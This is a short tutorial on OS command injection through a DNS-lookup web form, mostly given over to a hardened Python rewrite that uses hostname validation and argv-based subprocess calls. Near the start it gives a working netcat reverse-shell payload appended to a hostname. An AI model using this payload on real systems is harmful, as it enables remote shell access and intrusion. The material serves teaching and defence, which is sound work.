OS command injection is a technique that uses a web interface to execute operating system commands on the web server: the user supplies OS commands in input that the application passes on to a shell. Any web interface that does not properly sanitize its input is subject to this exploit. With the ability to execute OS commands, the user can upload malicious programs or even obtain passwords. OS command injection is preventable when security is emphasized during the design and development of applications.
As you can see, this is a DNS lookup, but it has an OS command injection vulnerability that lets us execute system commands.
We can even get a reverse shell out of it.
www.nsa.gov && rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.140.136 4455 >/tmp/f
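The root cause above is that the hostname is concatenated into a shell command line, so `&&`, `;` and `|` are interpreted by the shell. The following is an added example (not code from the original post or from the application it describes) of how the same DNS-lookup feature can be written safely: the hostname is validated against RFC 1123 label syntax, and the lookup program is invoked with an argument list rather than a shell string, so no metacharacter is ever parsed. The function names, the regex and the sample inputs are constructed for this example.

```python
import re
import subprocess

# RFC 1123 hostname: 1-253 chars total, labels of 1-63 alphanumerics or
# hyphens, no label starting or ending with a hyphen, optional trailing dot.
# The leading-hyphen rule also stops option injection (e.g. "-query=...")
# against the lookup binary.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)"
    r"(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*\.?$"
)


def is_valid_hostname(host: str) -> bool:
    """Allow-list check: only syntactically valid DNS names pass."""
    return bool(HOSTNAME_RE.match(host))


def unsafe_shell_command(host: str) -> str:
    """The vulnerable pattern, shown for contrast and never executed here:
    user input spliced into a string that a shell will parse."""
    return "nslookup " + host


def build_lookup_argv(host: str) -> list:
    """Hardened form: validate, then build an argv list (no shell involved)."""
    if not is_valid_hostname(host):
        raise ValueError("invalid hostname")
    return ["nslookup", host]


def dns_lookup(host: str, timeout: float = 5.0) -> str:
    """Run the lookup with subprocess and an argument list. Even if validation
    were bypassed, shell=False means the string is passed to nslookup as a
    single argument and not interpreted by /bin/sh."""
    argv = build_lookup_argv(host)
    result = subprocess.run(
        argv, capture_output=True, text=True, timeout=timeout, check=False
    )
    return result.stdout


if __name__ == "__main__":
    # Constructed inputs: a legitimate name and an injection attempt of the
    # kind shown above. The second one is rejected before anything runs.
    for candidate in ["www.nsa.gov", "www.nsa.gov && rm /tmp/f", "-query=any"]:
        print(candidate, "->", "valid" if is_valid_hostname(candidate) else "rejected")
```

Two layers are in play: the allow-list regex rejects the injection at the boundary, and the argv form removes the shell from the path entirely, so a validation bug alone is not enough to regain command execution. For detection, the same regex applied to the request parameter in web server logs flags attempts that never reached a shell.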